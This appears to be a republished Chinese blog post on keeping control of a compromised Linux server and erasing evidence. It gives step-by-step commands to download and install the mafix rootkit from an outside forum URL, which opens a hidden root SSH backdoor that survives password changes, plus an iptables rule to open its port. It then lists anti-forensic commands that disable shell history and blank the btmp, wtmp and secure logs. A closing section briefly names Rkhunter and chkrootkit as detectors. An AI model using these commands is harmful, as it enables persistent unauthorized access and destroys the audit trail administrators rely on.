linux入侵控制與痕跡清理


后門

(1)開機自動反彈shell

(2)linux后門

 

Rookit

目前常用的有:t0rn /mafix/enyelkm 等

mafix rootkit

Mafix是一款常用的輕量應用級別Rootkits,是通過偽造ssh協議漏洞實現遠程登陸的特點是配置簡單並可以自定義驗證密碼和端口號。
URL:http://forum.eviloctal.com/attachment.php?aid=13419

注意:在某些linux發行版上可能會遇到問題導致功能問題

安裝及使用:
wget http://forum.eviloctal.com/attachment.php?aid=13419
tar zvxf mafix.tar.gz
cd mafix
chmod +x root
./root pass port

安裝完成后,使用ssh 用戶@IP -P 配置的端口,即可遠程登錄。
netstat -tnl 也驗證端口是開放的。之前解壓文件的目錄/home/mafix在編譯完后自動消失,便於隱藏。

現在就可以用root,加上新密碼、端口進行登錄了,即使管理員改了root的密碼也可以登錄。

若無法登錄,檢查Linux的防火牆是否關閉,或者是否把新端口加入iptables中:

iptables -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 端口 -j ACCEPT

 

 

痕跡清理

清理命令記錄:

(1)僅清理當前用戶: history -c

(2)使系統不再保存命令記錄:vi /etc/profile,找到HISTSIZE這個值,修改為0

(3)刪除記錄

刪除登錄失敗記錄:echo > /var/log/btmp
刪除登錄成功記錄:echo > /var/log/wtmp (此時執行last命令就會發現沒有記錄)
刪除日志記錄:echo > /var/log/secure

 

安全檢測

Rkhunter

Rkhunter的中文名叫“Rootkit獵手”, 目前可以發現大多數已知的rootkits和一些嗅探器以及后門程序. 它通過執行一系列的測試腳本來確認服務器是否已經感染rootkits. 比如檢查rootkits使用的基本文件, 可執行二進制文件的錯誤文件權限, 檢測內核模塊等等。

Chkrootkit

當然如果只是用Rkhunter檢查掃描還是不夠權威,再來安裝一款檢查下吧,chkrootkit 是一款小巧易用的Unix平台上的可以檢測多種rootkit入侵的工具。它的功能包括檢測文件修改、utmp/wtmp/last日志修改、界面欺騙(promiscuous interfaces)、惡意核心模塊(maliciouskernel modules)。

 

 

相關鏈接

http://www.freebuf.com/articles/network/23665.html

http://www.myhack58.com/Article/html/3/8/2011/29132.htm

http://www.tuicool.com/articles/eIv22az

 

  


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM